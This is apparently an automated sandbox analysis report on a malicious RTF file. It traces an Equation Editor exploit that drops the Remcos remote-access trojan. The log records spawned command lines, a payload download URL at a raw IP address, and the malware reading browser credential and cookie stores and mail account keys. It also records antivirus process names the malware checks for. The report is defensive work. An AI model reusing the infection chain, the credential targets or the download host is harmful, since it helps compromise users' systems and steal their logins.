                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 1880
                        Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 6828
                        Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 559
                        Source: C:\ProgramData\Remcos\remcos.exe Window / User API: foregroundWindowGot 1693
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\netutils.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe API coverage: 9.4 %
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3284 Thread sleep time: -240000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3692 Thread sleep time: -5640000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3688 Thread sleep time: -126000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3732 Thread sleep time: -60000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3692 Thread sleep time: -20484000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3688 Thread sleep time: -279500s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 4060 Thread sleep time: -60000s >= -30000s
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3896 Thread sleep time: -180000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 2348 Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CA880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_15CA880C
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CA783C FindFirstFileW,FindNextFileW,5_2_15CA783C
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CBC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_15CBC291
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_032358CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_032358CC
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_2DE910F1
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE96580 FindFirstFileExA,9_2_2DE96580
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CA7C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_15CA7C97
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-882
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-846
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-824
                        Source: C:\Users\user\AppData\Roaming\hjc.exe API call chain: ExitProcess graph end node graph_5-55959
                        Source: C:\ProgramData\Remcos\remcos.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CDBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_15CDBB22
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CA6A63 LoadLibraryA,GetProcAddress,5_2_15CA6A63
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0354051A mov edx, dword ptr fs:[00000030h] 2_2_0354051A
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CE32B5 mov eax, dword ptr fs:[00000030h] 5_2_15CE32B5
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE94AB4 mov eax, dword ptr fs:[00000030h] 9_2_2DE94AB4
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CB1CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,5_2_15CB1CFE
                        Source: C:\ProgramData\Remcos\remcos.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CD4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_15CD4FDC
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CDBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_15CDBB22
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_2DE92639
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_2DE960E2
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_2DE92B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_2DE92B1C

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hjc.exe "C:\Users\user\AppData\Roaming\hjc.exe"
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"
                        Source: remcos.exe, 00000009.00000003.486603942.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845790757.00000000007B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                        Source: remcos.exe, 00000009.00000003.427901671.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.486603942.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr Binary or memory string: [Program Manager]
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CD4C35 cpuid 5_2_15CD4C35
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,OleUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_0324D5D0
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_03235A90
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: GetLocaleInfoA,5_2_0323A780
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: GetLocaleInfoA,5_2_0323A7CC
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,OleUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_0324D5D0
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_03235B9C
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_03255FA0
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: CoInitialize,OleUninitialize,EnumSystemLocalesA,9_2_0334D5D0
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesA,9_2_03355F9F
                        Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CBB4EF GetLocalTime,5_2_15CBB4EF
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CE9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_15CE9190
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0323B748 GetVersionExA,5_2_0323B748
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.dr Binary or memory strings (one finding each, same sources): cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe

                        Stealing of Sensitive Information

                        Source: Yara match File source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara match File source: C:\ProgramData\fggrt\logs.dat, type: DROPPED
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                        Source: C:\ProgramData\Remcos\remcos.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR

                        Remote Access Functionality

                        Source: C:\Users\user\AppData\Roaming\hjc.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\ProgramData\Remcos\remcos.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIF Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: Yara match File source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara match File source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara match File source: C:\ProgramData\fggrt\logs.dat, type: DROPPED

                        [ATT&CK technique matrix; tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]

                        Behavior Graph ID: 1430800, Sample: OKhCyJ619J.rtf, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100

                        Source | Detection | Scanner | Label | Link
                        OKhCyJ619J.rtf | 55% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
                        OKhCyJ619J.rtf | 100% | Avira | HEUR/Rtf.Malformed |

                        Source | Detection | Scanner | Label | Link
                        C:\Users\Public\Libraries\netutils.dll | 100% | Avira | TR/AVI.Agent.rqsyc |
                        C:\Users\Public\Libraries\Rdxcjsng.PIF | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Roaming\hjc.exe | 100% | Joe Sandbox ML | |
                        C:\ProgramData\Remcos\remcos.exe | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe | 100% | Joe Sandbox ML | |
                        C:\ProgramData\Remcos\remcos.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos |
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe | 71% | ReversingLabs | Win32.Backdoor.Remcos |
                        C:\Users\user\AppData\Roaming\hjc.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos |
                        C:\Users\Public\Libraries\Rdxcjsng.PIF | 71% | ReversingLabs | Win32.Backdoor.Remcos |
                        C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs | |
                        C:\Users\Public\Libraries\netutils.dll | 83% | ReversingLabs | Win64.Trojan.Acll |

                        No Antivirus matches
                        No Antivirus matches

                        Source | Detection | Scanner | Label | Link
                        http://www.imvu.comr | 0% | URL Reputation | safe |
                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
                        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
                        http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe |
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
                        http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
                        https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
                        http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing |
                        http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
                        http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe |
                        https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
                        http://geoplugin.net/json.gp | 100% | URL Reputation | phishing |
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
                        http://ocsp.sectigo.com0C | 0% | URL Reputation | safe |
                        http://www.ebuddy.com | 0% | URL Reputation | safe |
                        http://103.198.26.173/360/HJC.exe | 0% | Avira URL Cloud | safe |
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
                        http://crl.comode | 0% | Avira URL Cloud | safe |
                        https://www.adobe. | 0% | Avira URL Cloud | safe |
